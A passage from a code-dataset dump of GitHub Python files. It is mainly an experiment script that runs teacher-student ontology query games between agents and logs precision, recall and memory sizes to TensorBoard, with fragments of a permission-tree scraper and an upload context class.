save_to_file(parse_html(source),menu=\"pc\")\n # 移动端\n url_mobile = hayden_conf.DOMAIN + \"/sy/SY_PERMISSION_M/getPermissionTree?\"+ urlencode(params)\n source_mobile = get_html_source(url_mobile, req_session)\n save_to_file(parse_html(source_mobile),menu=\"m\")\nif __name__ == '__main__':\n main()", "repo_name": "weiyyed/internetWorm", "sub_path": "hayden_permission_demo.py", "file_name": "hayden_permission_demo.py", "file_ext": "py", "file_size_in_byte": 4015, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.sessions", "line_number": 13, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 22, "usage_type": "call"}, {"api_name": "json.JSONDecodeError", "line_number": 23, "usage_type": "name"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 35, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 38, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 38, "usage_type": "name"}, {"api_name": "config.hayden_conf.LOGIN_TYPE", "line_number": 40, "usage_type": "attribute"}, {"api_name": "config.hayden_conf", "line_number": 40, "usage_type": "name"}, {"api_name": "config.hayden_conf.LOGIN_TYPE", "line_number": 44, "usage_type": "attribute"}, {"api_name": "config.hayden_conf", "line_number": 44, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.wait.WebDriverWait", "line_number": 49, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 50, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 50, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 50, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 50, 
"usage_type": "name"}, {"api_name": "time.sleep", "line_number": 54, "usage_type": "call"}, {"api_name": "re.search", "line_number": 56, "usage_type": "call"}, {"api_name": "requests.session", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 73, "usage_type": "call"}, {"api_name": "config.hayden_conf.DOMAIN", "line_number": 74, "usage_type": "attribute"}, {"api_name": "config.hayden_conf", "line_number": 74, "usage_type": "name"}, {"api_name": "config.hayden_conf.USERNAME", "line_number": 74, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 74, "usage_type": "attribute"}, {"api_name": "config.hayden_conf.DOMAIN", "line_number": 87, "usage_type": "attribute"}, {"api_name": "config.hayden_conf", "line_number": 87, "usage_type": "name"}, {"api_name": "urllib.parse.urlencode", "line_number": 87, "usage_type": "call"}, {"api_name": "config.hayden_conf.USERNAME", "line_number": 88, "usage_type": "attribute"}, {"api_name": "config.hayden_conf", "line_number": 88, "usage_type": "name"}, {"api_name": "config.hayden_conf.PASSWORD", "line_number": 89, "usage_type": "attribute"}, {"api_name": "config.hayden_conf", "line_number": 89, "usage_type": "name"}, {"api_name": "config.hayden_conf.DOMAIN", "line_number": 90, "usage_type": "attribute"}, {"api_name": "config.hayden_conf", "line_number": 90, "usage_type": "name"}, {"api_name": "config.hayden_conf.DOMAIN", "line_number": 95, "usage_type": "attribute"}, {"api_name": "config.hayden_conf", "line_number": 95, "usage_type": "name"}, {"api_name": "urllib.parse.urlencode", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "25663882033", "text": "from experiment_utils import *\nimport datetime\nfrom tensorboardX import SummaryWriter\nimport pickle\nimport os\n# from agents import Agent\nimport shutil\n\ndef evaluate_students_understanding(student_agent, gt_results):\n\tquery_results = student_agent.get_student_query_results()\n\n\tquery_results_set = set(query_results)\n\t# evaluate results with GT results\n\tif len(query_results_set) != 0:\n\t\tprecision = len(gt_results.intersection(query_results_set)) / len(query_results_set)\n\telse:\n\t\tprecision = 0\n\trecall = len(gt_results.intersection(query_results_set)) / len(gt_results)\n\treturn precision, recall, len(query_results_set)\n\ndef teacher_student_one_query_one_interaction_cycle(teacher_agent, student_agent, gt_results_set, steps):\n\tepisode_generation_deadend = False\n\tfor step in range(steps):\n\t\tteachers_output = teacher_agent.select_next_teaching_example()\n\t\tif teachers_output is None:\n\t\t\tepisode_generation_deadend = True\n\t\t\tbreak\n\t\texample = teachers_output\n\t\texample_was_clear = student_agent.learn_from_example(example)\n\t\tteacher_agent.comprehend_students_response_on_example(example_was_clear)\n\n\tprecision, recall, query_result_size = evaluate_students_understanding(student_agent, gt_results_set)\n\n\treturn step+1, precision, recall, query_result_size, episode_generation_deadend\n\n\ndef teacher_student_one_query_experiment(teacher_agent, student_agent, teacher_policy, student_policy,\n\t\t\t\t\t\t\t\t\t\t teacher_property, student_property, max_steps, eval_every, output_dict_step_wise):\n\t'''\n\tHere, one selected agent is trying to query something specific (one query) from another 
agent.\n\tThe evaluation should take place on the query results in traditional IR terms.\n\t'''\n\n\t# get Ground Truth results, by querying the student with the correct translation\n\tgt_student_query_results = set()\n\tfor correct_result in student_agent.graph.subjects(RDF.type, URIRef(student_property)):\n\t\tgt_student_query_results.add(correct_result)\n\tnum_gt_results = len(gt_student_query_results)\n\n\tteacher_query_results = set()\n\tfor correct_result in teacher_agent.graph.subjects(RDF.type, URIRef(teacher_property)):\n\t\tteacher_query_results.add(correct_result)\n\tnum_teacher_results = len(teacher_query_results)\n\n\tteacher_translated_answer_URIs = teacher_agent.translate_URIs_for_other_agent(teacher_query_results)\n\n\tcommon_results = teacher_translated_answer_URIs.intersection(gt_student_query_results)\n\tnum_joint_results = len(common_results)\n\n\t# init teacher and student\n\tsuccessful_setup = teacher_agent.reset_as_teacher(query_property=teacher_property,\n\t\t\t\t\t\t\t\t\t\t\t\t\t teacher_policy=teacher_policy)\n\n\tif successful_setup and num_gt_results == 0:\n\t\t# print(\"Query:\", teacher_property, \"was captured by teacher's concepts, but student has not results!\", student_property)\n\t\toutcome_dict = {\"completed\": False, \"fail_reason\": \"Student has no GT query results.\"}\n\t\toutcome_dict[\"num_gt_results\"] = num_gt_results\n\t\toutcome_dict[\"num_teacher_results\"] = num_teacher_results\n\t\toutcome_dict[\"num_joint_results\"] = num_joint_results\n\t\treturn outcome_dict, output_dict_step_wise\n\telif not successful_setup:\n\t\toutcome_dict = {\"completed\": False, \"fail_reason\": \"Teacher failed to find relevant examples.\"}\n\t\toutcome_dict[\"num_gt_results\"] = num_gt_results\n\t\toutcome_dict[\"num_teacher_results\"] = num_teacher_results\n\t\toutcome_dict[\"num_joint_results\"] = num_joint_results\n\t\treturn outcome_dict, output_dict_step_wise\n\n\tstudent_agent.reset_as_student(student_policy=student_policy)\n\n\t# query_symbol = teacher_agent.characteristic_to_symbol[teacher_property]\n\n\ttotal_steps = 0\n\tprecision = 0\n\trecall = 0\n\ttensorboard_recording_step = 0\n\tepisode_generation_deadend = False\n\n\tquery_result_size = 0\n\tteachers_ep_mem_size = 0\n\tstudents_ep_mem_size = 0\n\tteachers_sem_mem_size = 0\n\tstudents_sem_mem_size = 0\n\n\twhile(tensorboard_recording_step < max_steps):\n\t\ttensorboard_recording_step += eval_every\n\n\t\t# if the experiment still goes on, we continue to execute it normally\n\t\tif not((precision == 1 and recall == 1) or episode_generation_deadend):\n\t\t\tstep, precision, recall, query_result_size, episode_generation_deadend = \\\n\t\t\t\tteacher_student_one_query_one_interaction_cycle(teacher_agent, student_agent,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tgt_student_query_results, steps=eval_every)\n\t\t\tteachers_ep_mem_size = teacher_agent.get_episodic_memory_size()\n\t\t\tstudents_ep_mem_size = student_agent.get_episodic_memory_size()\n\t\t\tteachers_sem_mem_size = teacher_agent.get_semantic_memory_size()\n\t\t\tstudents_sem_mem_size = student_agent.get_semantic_memory_size()\n\t\t\toutput_dict_step_wise[\"0.running\"][tensorboard_recording_step].append(True)\n\t\t\ttotal_steps += step\n\t\telse:\n\t\t\toutput_dict_step_wise[\"0.running\"][tensorboard_recording_step].append(False)\n\n\n\t\t# either if the experiment still goes on, or simply if we have the last recorded values, we still record them for 
tensorboard.\n\t\toutput_dict_step_wise[\"1.precision\"][tensorboard_recording_step].append(precision)\n\t\toutput_dict_step_wise[\"2.recall\"][tensorboard_recording_step].append(recall)\n\t\toutput_dict_step_wise[\"3.query_result_size\"][tensorboard_recording_step].append(query_result_size)\n\t\toutput_dict_step_wise[\"4.teachers_ep_mem_size\"][tensorboard_recording_step].append(teachers_ep_mem_size)\n\t\toutput_dict_step_wise[\"5.students_ep_mem_size\"][tensorboard_recording_step].append(students_ep_mem_size)\n\t\toutput_dict_step_wise[\"6.teachers_sem_mem_size\"][tensorboard_recording_step].append(teachers_sem_mem_size)\n\t\toutput_dict_step_wise[\"7.students_sem_mem_size\"][tensorboard_recording_step].append(students_sem_mem_size)\n\n\n\toutcome_dict={}\n\toutcome_dict[\"completed\"] = True\n\toutcome_dict[\"precision\"] = precision\n\toutcome_dict[\"recall\"] = recall\n\toutcome_dict[\"total_steps\"] = total_steps\n\toutcome_dict[\"episode_generation_deadend\"] = int(episode_generation_deadend)\n\toutcome_dict[\"query_result_size\"] = query_result_size\n\toutcome_dict[\"num_gt_results\"] = num_gt_results\n\toutcome_dict[\"num_teacher_results\"] = num_teacher_results\n\toutcome_dict[\"num_joint_results\"] = num_joint_results\n\toutcome_dict[\"teachers_ep_mem_size\"] = teacher_agent.get_episodic_memory_size()\n\toutcome_dict[\"students_ep_mem_size\"] = student_agent.get_episodic_memory_size()\n\toutcome_dict[\"teachers_sem_mem_size\"] = teacher_agent.get_semantic_memory_size()\n\toutcome_dict[\"students_sem_mem_size\"] = student_agent.get_semantic_memory_size()\n\n\treturn outcome_dict, output_dict_step_wise\n\n\n\n\ndef try_many_queries_separately_among_two_agents(args, ont_prefixes, query_mappings, teacher_policy, student_policy, exp_dir, complete_experiment_output_dict_step_wise):\n\tstatistics = defaultdict(dict)\n\tagent_1_prefix = ont_prefixes[0]\n\tagent_2_prefix = ont_prefixes[1]\n\tagent_1_teacher_key = \"teacher_\" + agent_1_prefix\n\tagent_2_teacher_key = \"teacher_\" + agent_2_prefix\n\n\tontology_pair_start_t = datetime.datetime.now()\n\n\t# preprocess and initialize agents\n\tagent_1 = Agent(agent_1_prefix, os.path.join(args.dataset_dir + \"/\" + args.data_directory, agent_1_prefix + \".owl\"))\n\tagent_2 = Agent(agent_2_prefix, os.path.join(args.dataset_dir + \"/\" + args.data_directory, agent_2_prefix + \".owl\"))\n\n\t# read common instance alignments\n\tif args.common_instances == \"simple\":\n\t\tcommon_URIs = get_common_objects([agent_1, agent_2])\n\t\tontology_1_to_ontology_2_instance_mapping_dict = {URI: URI for URI in common_URIs}\n\t\tontology_2_to_ontology_1_instance_mapping_dict = ontology_1_to_ontology_2_instance_mapping_dict\n\telif args.common_instances == \"extended\":\n\t\tontology_1_to_ontology_2_instance_mapping_dict = dict()\n\t\tontology_2_to_ontology_1_instance_mapping_dict = dict()\n\t\tfor line in open(args.dataset_dir + \"/\" + args.instance_alignments_dir + \"/\" + agent_1_prefix + \"-\" + agent_2_prefix + \".csv\", \"r\"):\n\t\t\tURI_1, URI_2 = line[:-1].split(\",\")\n\t\t\tURI_1, URI_2 = URIRef(URI_1), URIRef(URI_2)\n\t\t\tontology_1_to_ontology_2_instance_mapping_dict[URI_1] = URI_2\n\t\t\tontology_2_to_ontology_1_instance_mapping_dict[URI_2] = URI_1\n\telse:\n\t\traise ValueError(\"argument --common_instances, got wrong value:\" + args.common_instances)\n\n\t# save instance mapping dictionary, initialize groups and concept 
vocabulary\n\tagent_1.prepare_for_understanding_games(ontology_1_to_ontology_2_instance_mapping_dict)\n\tagent_2.prepare_for_understanding_games(ontology_2_to_ontology_1_instance_mapping_dict)\n\n\tontology_pair_output_dict_step_wise = defaultdict(lambda: defaultdict(list))\n\n\t# execute query experiments:\n\tfor q in range(len(query_mappings)):\n\t\tagents = [agent_1, agent_2]\n\t\tagent_teacher_keys = [agent_1_teacher_key, agent_2_teacher_key]\n\t\tquery_mapping = query_mappings[q]\n\n\t\tfor i in range(len(agents)):\n\t\t\tteacher_index = i\n\t\t\tstudent_index = (i + 1) % 2\n\t\t\tteacher_agent = agents[teacher_index]\n\t\t\tstudent_agent = agents[student_index]\n\t\t\tquery = query_mapping[teacher_index]\n\t\t\tquery_translation = query_mapping[student_index]\n\t\t\tquery_pair = (query,query_translation)\n\t\t\tagent_teacher_key = agent_teacher_keys[teacher_index]\n\n\t\t\tstatistics[agent_teacher_key][query_pair] = defaultdict(list)\n\n\t\t\tfor iteration in range(args.repetitions):\n\t\t\t\toutcome_dict, ontology_pair_output_dict_step_wise = teacher_student_one_query_experiment(teacher_agent, student_agent,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t teacher_policy, student_policy, URIRef(query),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t URIRef(query_translation), args.max_steps,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t args.eval_every, ontology_pair_output_dict_step_wise)\n\n\t\t\t\tstatistics[agent_teacher_key][query_pair][\"completed\"].append(outcome_dict[\"completed\"])\n\t\t\t\tstatistics[agent_teacher_key][query_pair][\"num_gt_results\"] = outcome_dict[\"num_gt_results\"]\n\t\t\t\tstatistics[agent_teacher_key][query_pair][\"num_teacher_results\"] = outcome_dict[\"num_teacher_results\"]\n\t\t\t\tstatistics[agent_teacher_key][query_pair][\"num_joint_results\"] = outcome_dict[\"num_joint_results\"]\n\n\t\t\t\tif outcome_dict[\"completed\"]:\n\t\t\t\t\tkeys_to_append_list = [\"precision\", \"recall\", \"total_steps\", \"episode_generation_deadend\", \"query_result_size\",\n\t\t\t\t\t\t\t\t\t\t \"teachers_ep_mem_size\", \"students_ep_mem_size\", \"teachers_sem_mem_size\", \"students_sem_mem_size\"]\n\t\t\t\t\tappend_to_list_from_one_dictionary_to_other(source_dict=outcome_dict, target_dict=statistics[agent_teacher_key][query_pair],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tkeys_to_append_list=keys_to_append_list)\n\t\t\t\t\tprefect_score = int((outcome_dict[\"precision\"] == 1) and (outcome_dict[\"recall\"] == 1))\n\t\t\t\t\tstatistics[agent_teacher_key][query_pair][\"perfect_score\"].append(prefect_score)\n\t\t\t\telse:\n\t\t\t\t\tstatistics[agent_teacher_key][query_pair][\"fail_reason\"].append(outcome_dict[\"fail_reason\"])\n\n\t# aggregate and structure query results\n\tont_pair_statistics = defaultdict(list)\n\tdetailed_statistics_str_descriptions = []\n\t# we save all unsuccessful queries (where the teacher couldn't come up with not even one example) in a list to print them all together at the end\n\tunsuccessful_queries = []\n\tfor (query_1, query_1_translation) in query_mappings:\n\t\tagent_teacher_keys = [agent_1_teacher_key, agent_2_teacher_key]\n\t\tqueries = [query_1, query_1_translation]\n\n\t\tfor i in range(len(agent_teacher_keys)):\n\t\t\tteacher_index = i\n\t\t\tstudent_index = (i + 1) % 2\n\t\t\tagent_teacher_key = agent_teacher_keys[teacher_index]\n\t\t\tquery = queries[teacher_index]\n\t\t\tquery_translation = queries[student_index]\n\t\t\tquery_pair = (query, query_translation)\n\n\t\t\tav_stats_dict, std_stats_dict = 
aggregate_statistics_of_dictionary_of_list_of_values(statistics[agent_teacher_key][query_pair])\n\n\t\t\tquery_description_str = \"Query: \" + query + \" (\" + str(av_stats_dict[\"num_teacher_results\"])\\\n\t\t\t\t\t\t\t\t\t+ \"), -> \" + query_translation +\"(\" + str(av_stats_dict[\"num_gt_results\"]) \\\n\t\t\t\t\t\t\t\t\t+ \"), Common Results: \" + str(av_stats_dict[\"num_joint_results\"])\n\n\t\t\t# in case for some reason, the game was not successfully initiated for any of the iterations:\n\t\t\t# (if no experiment was executed successfully, then no statistics were appended for this teacher-query combination)\n\t\t\tif sum(statistics[agent_teacher_key][query_pair][\"completed\"]) == 0:\n\t\t\t\tunsuccessful_queries.append((query_description_str, av_stats_dict[\"fail_reason\"][0]))\n\t\t\t\tont_pair_statistics[\"completed\"] += statistics[agent_teacher_key][query_pair][\"completed\"]\n\t\t\telse:\n\t\t\t\tkeys_to_append_list = [\"completed\", \"precision\", \"recall\", \"total_steps\", \"query_result_size\", \"episode_generation_deadend\",\n\t\t\t\t\t\t\t\t\t \"perfect_score\", \"teachers_ep_mem_size\", \"students_ep_mem_size\", \"teachers_sem_mem_size\", \"students_sem_mem_size\"]\n\t\t\t\tappend_to_list_from_one_dictionary_to_other(source_dict=statistics[agent_teacher_key][query_pair], target_dict=ont_pair_statistics,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tkeys_to_append_list=keys_to_append_list)\n\t\t\t\tdetailed_statistics_str_descriptions.append(query_description_str)\n\t\t\t\tdetailed_statistics_str_descriptions.append(format_average_query_performance_in_str(av_stats_dict, std_stats_dict, is_single_query=True))\n\n\ttensorboard_writer_ontology_pair_experiment_dir = os.path.join(exp_dir, \"-\".join(ont_prefixes))\n\tos.mkdir(tensorboard_writer_ontology_pair_experiment_dir)\n\tontology_pair_tensorboard_writer = SummaryWriter(log_dir=tensorboard_writer_ontology_pair_experiment_dir)\n\n\t# write to tensorboard while also update complete_experiment_output_dict_step_wise according to ontology_pair_output_dict_step_wise 9append values per key and per step.\n\t_, complete_experiment_output_dict_step_wise = write_average_query_performance_to_tensorboard(\n\t\tontology_pair_tensorboard_writer, ontology_pair_output_dict_step_wise, args.max_steps, args.eval_every,\n\tother_dictionary_to_append=complete_experiment_output_dict_step_wise)\n\n\t# write results to file\n\t# aggregate and report results per agent-teacher_role and per query\n\twith open(os.path.join(exp_dir, \"-\".join(ont_prefixes) + \".txt\"), \"w\") as ontology_pair_file:\n\n\t\tnum_completed_query_experiments = int(len(detailed_statistics_str_descriptions)/2)\n\n\t\ttext_for_ontology_pair_file = \"Agent: \" + agent_1_prefix +\" (\" + str(len(agent_1.get_all_named_individuals()))\n\t\ttext_for_ontology_pair_file += \"), Agent: \" + agent_2_prefix +\" (\" + str(len(agent_2.get_all_named_individuals()))\n\t\ttext_for_ontology_pair_file += \"), Common: \" + str(len(ontology_1_to_ontology_2_instance_mapping_dict)) + \", Query Pairs: \" + str(len(query_mappings))\n\t\ttext_for_ontology_pair_file += f\" Completed Queries: {num_completed_query_experiments}, Unsuccessful Queries: {len(unsuccessful_queries)}\"\n\n\t\tontology_pair_file.write(text_for_ontology_pair_file + \"\\n\")\n\n\t\tav_ont_pair_stats_dict, std_ont_pair_stats_dict = aggregate_statistics_of_dictionary_of_list_of_values(ont_pair_statistics)\n\n\t\tontology_pair_file.write(\"Overall ontology pair performance over the completed query 
experiments:\\n\")\n\t\tontology_pair_overall_performance_str = format_average_query_performance_in_str(av_ont_pair_stats_dict, std_ont_pair_stats_dict, is_single_query=False)\n\t\tontology_pair_file.write(ontology_pair_overall_performance_str + \"\\n\")\n\n\t\twith open(os.path.join(exp_dir, \"0_Comparisons_Summary.txt\"), \"a\") as complete_experiments_comparisons_file:\n\t\t\tcomplete_experiments_comparisons_file.write(text_for_ontology_pair_file + \"\\n\" + ontology_pair_overall_performance_str + \"\\n\\n\")\n\n\t\tontology_pair_end_t = datetime.datetime.now()\n\t\tontology_pair_time_delta = ontology_pair_end_t - ontology_pair_start_t\n\t\tontology_pair_minutes = ontology_pair_time_delta.total_seconds() / 60\n\t\tontology_pair_file.write(f\"Experiment duration: {ontology_pair_minutes:05.2} minutes.\\n\\n\\n\")\n\n\t\t# then report for each completed query experiment\n\t\tfor i in range(num_completed_query_experiments):\n\t\t\tquery_description_str = detailed_statistics_str_descriptions[i*2]\n\t\t\tquery_results_str = detailed_statistics_str_descriptions[i*2 + 1]\n\t\t\tontology_pair_file.write(query_description_str + \"\\n\" + query_results_str + \"\\n\\n\")\n\t\t\t# print(query_description_str + \"\\n\" + query_results_str + \"\\n\")\n\n\t\t# finally, report for each unsuccessful experiment\n\t\tontology_pair_file.write(\"\\nUnsuccessful Queries:\\n\")\n\t\tfor (query_description_str, fail_reason) in unsuccessful_queries:\n\t\t\tontology_pair_file.write(query_description_str + \"| Reason:\" + fail_reason + \"\\n\\n\")\n\t\t\t# print(query_description_str + \"| Reason:\" + fail_reason + \"\\n\")\n\n\treturn ont_pair_statistics, complete_experiment_output_dict_step_wise\n\ndef run_all_teacher_student_combinations_using_gold_alignments(args):\n\tall_prefix_pairs = get_all_prefix_pairs()\n\n\t# prepare experiment directories and filenames\n\tif not os.path.isdir(args.exp_dir):\n\t\tos.mkdir(args.exp_dir)\n\tif len(all_prefix_pairs) == 21:\n\t\texperiment_name = \"all_ontology_pairs__\"\n\telse:\n\t\texperiment_name = \"_\".join(all_prefix_pairs) + \"__\"\n\n\tteacher_policy = args.teacher_policy\n\tstudent_policy = args.student_policy\n\n\texperiment_name += \"TP=\" + teacher_policy + \"__SP=\" + student_policy + \"__\"\n\texperiment_name += \"reps=\" + str(args.repetitions) + \"__\"\n\texperiment_name += \"instances=\" + args.common_instances + \"__\"\n\texperiment_name += \"max_steps=\" + str(args.max_steps)\n\n\texp_dir = os.path.join(args.exp_dir, experiment_name)\n\t# \tif the directory exists already then we empty it\n\tif os.path.isdir(exp_dir):\n\t\tfor file in os.listdir(exp_dir):\n\t\t\tpath = os.path.join(exp_dir, file)\n\t\t\tif os.path.isfile(path):\n\t\t\t\tos.remove(path)\n\t\t\telse:\n\t\t\t\tshutil.rmtree(path)\n\t# otherwise, we just create it\n\telse:\n\t\tos.mkdir(exp_dir)\n\n\n\tprint(\"Running experiment. 
Output will be saved in directory:\", exp_dir)\n\n\ttensorboard_writer_average_experiment_dir = os.path.join(exp_dir, \"average\")\n\tos.mkdir(tensorboard_writer_average_experiment_dir)\n\texperiment_average_tensorboard_writer = SummaryWriter(log_dir=tensorboard_writer_average_experiment_dir)\n\n\tontology_pair_performances_dict = defaultdict(list)\n\t# monitor experiment execution time per ontology pair.\n\tstart_t = datetime.datetime.now()\n\n\tcomplete_experiment_output_dict_step_wise = defaultdict(lambda: defaultdict(list))\n\n\tfor prefix_pair in all_prefix_pairs:\n\t\tprefix_pair_tuple = prefix_pair.split(\"-\")\n\t\tequivalent_classes, equivalent_properties = load_ontology_alignments(ont_1_prefix=prefix_pair_tuple[0],\n\t\t\t\t\t\t ont_2_prefix=prefix_pair_tuple[1], dir_path=args.dataset_dir + \"/\" + args.reference_alignments_dir)\n\n\t\tpair_ontology_performance, complete_experiment_output_dict_step_wise = try_many_queries_separately_among_two_agents(args, ont_prefixes=prefix_pair_tuple,\n\t\t\t\t\tquery_mappings=equivalent_classes, teacher_policy=teacher_policy,\tstudent_policy=student_policy,\n\t\t\t\t\t\t\t\t\t\texp_dir=exp_dir, complete_experiment_output_dict_step_wise=complete_experiment_output_dict_step_wise)\n\n\t\tkeys_to_append_list = [\"completed\", \"precision\", \"recall\", \"total_steps\", \"query_result_size\", \"episode_generation_deadend\",\n\t\t\t\t\t\t\t \"perfect_score\", \"teachers_ep_mem_size\", \"students_ep_mem_size\", \"teachers_sem_mem_size\", \"students_sem_mem_size\"]\n\t\tappend_to_list_from_one_dictionary_to_other(source_dict=pair_ontology_performance, target_dict=ontology_pair_performances_dict,\n\t\t\t\t\t\t\t\t\t\t\t\t\tkeys_to_append_list=keys_to_append_list)\n\n\n\tend_t = datetime.datetime.now()\n\ttime_delta = end_t - start_t\n\tminutes = time_delta.total_seconds() / 60\n\n\tav_performance_stats_dict, std_performance_stats_dict = aggregate_statistics_of_dictionary_of_list_of_values(ontology_pair_performances_dict)\n\n\tperformance_summary_str = format_average_query_performance_in_str(av_performance_stats_dict, std_performance_stats_dict, is_single_query=False)\n\n\taverage_values_per_step, _ = write_average_query_performance_to_tensorboard(experiment_average_tensorboard_writer, complete_experiment_output_dict_step_wise, args.max_steps, args.eval_every)\n\n\twith open(os.path.join(exp_dir, \"0_Summary.txt\"), \"w\") as complete_experiments_file:\n\t\tcomplete_experiments_file.write(performance_summary_str)\n\t\tcomplete_experiments_file.write(f\"Experiment duration: {minutes:06.2} minutes.\\n\\n\\n\")\n\n\twith open(os.path.join(exp_dir,'av_stats_per_step_dict.pickle'), 'wb') as handle:\n\t\tpickle.dump(average_values_per_step, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\tav_precision = av_performance_stats_dict[\"precision\"]\n\tav_recall = av_performance_stats_dict[\"recall\"]\n\tav_total_steps = av_performance_stats_dict[\"total_steps\"]\n\tav_teacher_ep_mem = av_performance_stats_dict[\"teachers_ep_mem_size\"]\n\tav_student_ep_mem = av_performance_stats_dict[\"students_ep_mem_size\"]\n\tav_student_sem_mem = av_performance_stats_dict[\"students_sem_mem_size\"]\n\n\n\tprint(f\"Task (Query) Performance Metrics:\\nPrecision: {av_precision:04.2}, Recall: {av_recall:04.2}\")\n\tprint(f\"Efficiency Metrics:\\nInteraction time (#Examples): {av_total_steps:04.2}, Teacher Episodic Memory: {av_teacher_ep_mem:04.2}, Student Episodic Memory: {av_student_ep_mem:04.2}, Student Working Memory: {av_student_sem_mem:04.2}\")\n\n\n", "repo_name": 
"kondilidisn/shared_query_understanding", "sub_path": "experiments.py", "file_name": "experiments.py", "file_ext": "py", "file_size_in_byte": 20517, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.now", "line_number": 149, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 149, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path", "line_number": 153, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 252, "usage_type": "call"}, {"api_name": "os.path", "line_number": 252, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 253, "usage_type": "call"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 254, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 263, "usage_type": "call"}, {"api_name": "os.path", "line_number": 263, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 280, "usage_type": "call"}, {"api_name": "os.path", "line_number": 280, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 283, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 283, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 307, "usage_type": "call"}, {"api_name": "os.path", "line_number": 307, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 308, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 322, "usage_type": "call"}, {"api_name": "os.path", "line_number": 322, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 324, "usage_type": "call"}, {"api_name": "os.path", "line_number": 324, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 325, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 326, "usage_type": "call"}, {"api_name": "os.path", "line_number": 326, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 327, "usage_type": "call"}, {"api_name": "os.path", "line_number": 327, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 328, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 330, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 333, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 338, "usage_type": "call"}, {"api_name": "os.path", "line_number": 338, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 339, "usage_type": "call"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 340, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 344, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 344, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 363, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 363, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 373, "usage_type": "call"}, {"api_name": "os.path", "line_number": 373, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 377, "usage_type": "call"}, {"api_name": "os.path", "line_number": 377, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 378, "usage_type": "call"}, {"api_name": 
"pickle.HIGHEST_PROTOCOL", "line_number": 378, "usage_type": "attribute"}]} +{"seq_id": "25215606921", "text": "import os\nimport logging\nimport ConfigParser\n\nEXCLUDED_BY_FILE_FILTER = 'file-filter'\nEXCLUDED_BY_LOCAL_METADATA = 'local-metadata'\nFLAG_FILE_CHANGED_WHILE_UPLOADING = 'file-changed'\n\n\nclass Context(dict):\n \"\"\"Context to share state between all the components\"\"\"\n\n def __init__(self, config=None):\n self.log = {}\n self.excluded_count = 0\n self.included_count = 0\n self.error_count = 0\n self.include_extensions = []\n self.exclude_extensions = []\n self.config = config or get_config()\n self.dry_run = False\n\n def add_log(self, directory, filename, **kwargs):\n self.log[directory] = self.log.get(directory, dict())\n self.log[directory][filename] = self.log[directory].get(filename, dict())\n self.log[directory][filename].update(**kwargs)\n\n def add_excluded(self, directory, filename, reason):\n self.add_log(directory, filename, excluded=True,\n excluded_reason=reason)\n self.excluded_count += 1\n\n def add_included(self, directory, filename):\n self.add_log(directory, filename, included=True)\n self.included_count += 1\n\n def add_error(self, directory, filename, error_type, error_message):\n self.add_log(directory, filename, error=True, error_type=error_type,\n error_message=error_message)\n self.error_count += 1\n\n def set_include_extensions(self, extensions):\n assert isinstance(extensions, (list, tuple))\n self.include_extensions = [tmp.lower() for tmp in 